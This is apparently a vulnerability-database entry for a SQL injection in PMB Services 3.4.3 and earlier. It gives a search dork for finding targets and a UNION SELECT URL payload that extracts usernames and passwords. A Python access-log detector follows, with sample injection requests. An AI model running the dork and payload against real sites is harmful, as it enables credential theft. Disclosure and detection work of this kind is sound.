PMB Services <= 3.4.3 SQL injection vulnerability

2011-02-04T00:00:00
ID MYHACK58:62201128980
Type myhack58
Reporter Anonymous
Modified 2011-02-04T00:00:00

Description

PMB Services is a French PHP web application. In PMB Services <= 3.4.3, index.php has a SQL injection vulnerability that could lead to disclosure of sensitive information.

[+]info: ~~~~~~~~~

Exploit Title: [ PMB Services <= 3.4.3 Remote SQL Injection ]

Author : Luchador

Date : 29-01-2011

Location : Algeria

Site : http://vbspiders.com

Critical Lvl : Dangerous

Mail: nourie.tlm[at]gmail.com

[+]poc: ~~~~~~~~~ - Remote SQL Injection

dork : inurl:opac_css or inurl:index.php?lvl=coll_see&id=

Exploit:

~~~~~~~~~ http://www.target.com[path pmb]/index.php?lvl=coll_see&id=-1//union//select+1,2,3,unhex(hex(group_CONCAT(username,0x3a,pwd))),5,6,7+from+users--

[+]Reference: ~~~~~~~~~ http://www.exploit-db.com/exploits/16087
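
A detection check for the request pattern in this advisory, added here as an example and not part of the original advisory or of PMB's code: it flags access-log entries where `lvl=coll_see` is requested with an `id` that is not a plain integer. The combined log format, the `/pmb/` path prefix, the 10-digit id limit and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Assumption: a legitimate collection id is a plain non-negative integer.
VALID_ID_RE = re.compile(r"\d{1,10}")


def suspicious_coll_see(line):
    """Return the decoded id value if the line is a lvl=coll_see request
    to index.php whose id is not a plain integer, otherwise None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith("index.php"):
        return None
    # parse_qs percent-decodes values and turns '+' into a space.
    params = parse_qs(parts.query, keep_blank_values=True)
    if "coll_see" not in params.get("lvl", []):
        return None
    for value in params.get("id", []):
        if not VALID_ID_RE.fullmatch(value.strip()):
            return value
    return None


def scan(lines):
    """Yield (client_ip, id_value) for every flagged log line."""
    for line in lines:
        value = suspicious_coll_see(line)
        if value is not None:
            yield line.split(" ", 1)[0], value


# Constructed sample log lines (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Feb/2011:10:00:01 +0000] "GET /pmb/opac_css/index.php?lvl=coll_see&id=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [04/Feb/2011:10:00:05 +0000] "GET /pmb/opac_css/index.php?lvl=coll_see&id=-1//union//select+1,2,3 HTTP/1.1" 200 7301',
    '192.0.2.10 - - [04/Feb/2011:10:00:09 +0000] "GET /pmb/opac_css/index.php?lvl=author_see&id=3 HTTP/1.1" 200 4100',
    '203.0.113.5 - - [04/Feb/2011:10:00:12 +0000] "GET /pmb/opac_css/index.php?lvl=coll_see&id=7%20or%201%3D1 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip}\tnon-numeric id: {value!r}")
```

The same integer-only rule is the server-side mitigation: an `id` that fails the check should be rejected before it reaches any SQL query.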